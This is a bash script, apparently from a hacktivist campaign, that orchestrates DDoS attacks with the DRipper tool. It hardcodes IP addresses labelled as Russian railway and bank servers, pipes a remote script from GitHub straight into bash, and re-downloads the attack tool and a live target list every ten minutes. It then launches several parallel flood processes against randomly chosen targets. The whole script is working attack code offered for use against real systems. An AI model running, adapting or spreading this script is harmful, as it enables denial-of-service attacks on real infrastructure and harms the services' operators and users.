##### Use next command in local linux terminal to run this script. #####
# >>> curl -s https://raw.githubusercontent.com/KarboDuck/karbo-wiki/master/DRipper_main | bash <<<

##### To kill script CTRL+C will not be sufficient.
##### Open other terminal and run 'pkill -9 python3'. Then press CTRL+C in terminal where DRipper was launched.

#!/bin/bash
num_of_targets_to_attack=4

declare -a targets
###################### LIST OF TARGETS #########################
targets[0]="193.104.87.251 80 tcp"       #РЖД
targets[1]="194.84.25.50 80 tcp"         #РЖД
targets[2]="5.188.56.124 22 tcp"         #админ сервер ВТБ
targets[3]="194.54.14.131 4477 tcp"      #порт додатку сбера
################################################################


number_of_targets_in_list=${#targets[*]}
echo "number of targets in list: " $number_of_targets

# Choose random number(s) to choose random targets from array "targets"
random_numbers=$(shuf -i 1-$number_of_targets_in_list -n $num_of_targets_to_attack)

for i in $num_of_targets_to_attack
do
             # Get address, port and protocol from choosen target site
             site=targets[i]
             addr=$(echo $site | awk '{print $1}')
             port=$(echo $site | awk '{print $2}')
             prot=$(echo $site | awk '{print $3}')
             
             echo $site $port $prot
             sleep 1
            
             # Launch DRipper to attack site choosen above
             python3 -u ~/russia_ddos/DRipper.py -l 2048 -s $addr -p $port -m $prot -t 50&
done




while true
do
        pkill -9 python3
        
        ## Download newest version of DRipper
        cd ~
        rm -rf russia_ddos
        git clone https://github.com/alexmon1989/russia_ddos.git
        pip install -r russia_ddos/requirements.txt
        
        ## Launch several copies of DRipper. All output will run in single terminal so will be slightly messy.
        ## But it is more efficient and easy to manage.
        DR_threads=6
        for i in $(seq 1 $DR_threads)
        do
        
             # Get random line from list of targets. First 5 lines ommited
             site=$(curl -s https://raw.githubusercontent.com/KarboDuck/karbo-wiki/master/DRipper_targets | tail -n +6 | shuf -n 1)
             
             # Get site address, port and protocol from the line (1, 2 and 3 'collumn')
             addr=$(echo $site | awk '{print $1}')
             port=$(echo $site | awk '{print $2}')
             prot=$(echo $site | awk '{print $3}')
             echo $site $port $prot
             sleep 1
            
             # Launch DRipper to attack site choosen above
             python3 -u ~/russia_ddos/DRipper.py -l 2048 -s $addr -p $port -m $prot -t 50&
        done
        
        # Sleep for 10 min (600 sec). Kill python3 to relaunch DRipper
        # This will re-read list of sites on github and start to attack new sites if list was updated
        sleep 600
        pkill -9 python3
done
